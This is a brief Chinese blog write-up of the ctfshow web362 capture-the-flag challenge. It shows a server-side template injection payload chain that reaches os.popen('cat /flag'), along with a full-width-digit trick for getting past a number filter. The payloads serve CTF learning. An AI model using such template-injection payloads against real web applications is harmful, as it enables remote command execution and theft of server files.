当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- Rust: shared variable in thread pool
- CISSP certified daily knowledge points (April 13, 2022)
- How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
- QT notes on qmap container freeing memory
- Keil RVMDK compiled data type
- Permission management with binary
- Daily network security certification test questions (April 14, 2022)
- 硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
- Using transmittablethreadlocal to realize parameter cross thread transmission
- Test questions of daily safety network (February 2024)
猜你喜欢
Robocode tutorial 7 - Radar locking
Stm32mp157 wm8960 audio driver debugging notes
【ACM】509. Fibonacci number (DP Trilogy)
【ACM】455. 分发饼干(1. 大饼干优先喂给大胃口;2. 遍历两个数组可以只用一个for循环(用下标索引--来遍历另一个数组))
【ACM】509. 斐波那契数(dp五部曲)
How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
Halo 开源项目学习(七):缓存机制
【ACM】70. climb stairs
Analysez l'objet promise avec le noyau dur (Connaissez - vous les sept API communes obligatoires et les sept questions clés?)
From introduction to mastery of MATLAB (2)
随机推荐
In shell programming, the shell file with relative path is referenced
Dynamically add default fusing rules to feign client based on sentinel + Nacos
由tcl脚本生成板子对应的vivado工程
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
Creation and use of QT dynamic link library
MySQL auto start settings start with systemctl start mysqld
The difference between deep copy and shallow copy
Daily network security certification test questions (April 15, 2022)
Can filter
What are the relationships and differences between threads and processes
登录和发布文章功能测试
Interpretation and compilation of JVM
【ACM】376. 摆动序列
CISSP certified daily knowledge points (April 11, 2022)
Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
Test post and login function
Daily CISSP certification common mistakes (April 18, 2022)
Quantexa CDI(场景决策智能)Syneo平台介绍
logstash 7. There is a time problem in X. the difference between @ timestamp and local time is 8 hours